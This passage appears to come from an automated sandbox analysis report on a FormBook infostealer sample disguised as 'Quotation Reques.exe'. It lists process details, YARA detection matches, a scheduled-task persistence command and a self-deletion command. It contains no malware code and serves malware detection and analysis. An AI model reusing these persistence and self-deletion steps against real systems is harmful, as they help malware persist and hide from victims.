                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Reputation:low

                                                                                              General

                                                                                              Start time:09:38:20
                                                                                              Start date:23/02/2021
                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp'
                                                                                              Imagebase:0x1190000
                                                                                              File size:185856 bytes
                                                                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:09:38:20
                                                                                              Start date:23/02/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7ecfc0000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:09:38:21
                                                                                              Start date:23/02/2021
                                                                                              Path:C:\Users\user\Desktop\Quotation Reques.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\Desktop\Quotation Reques.exe
                                                                                              Imagebase:0x660000
                                                                                              File size:549376 bytes
                                                                                              MD5 hash:5A752FCD71ACB65C618A829610B7B7E1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Reputation:low

                                                                                              General

                                                                                              Start time:09:38:23
                                                                                              Start date:23/02/2021
                                                                                              Path:C:\Windows\explorer.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:
                                                                                              Imagebase:0x7ff693d90000
                                                                                              File size:3933184 bytes
                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:09:38:39
                                                                                              Start date:23/02/2021
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                              Imagebase:0x380000
                                                                                              File size:232960 bytes
                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:09:38:44
                                                                                              Start date:23/02/2021
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:/c del 'C:\Users\user\Desktop\Quotation Reques.exe'
                                                                                              Imagebase:0x380000
                                                                                              File size:232960 bytes
                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:09:38:45
                                                                                              Start date:23/02/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7ecfc0000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Disassembly

                                                                                              Code Analysis
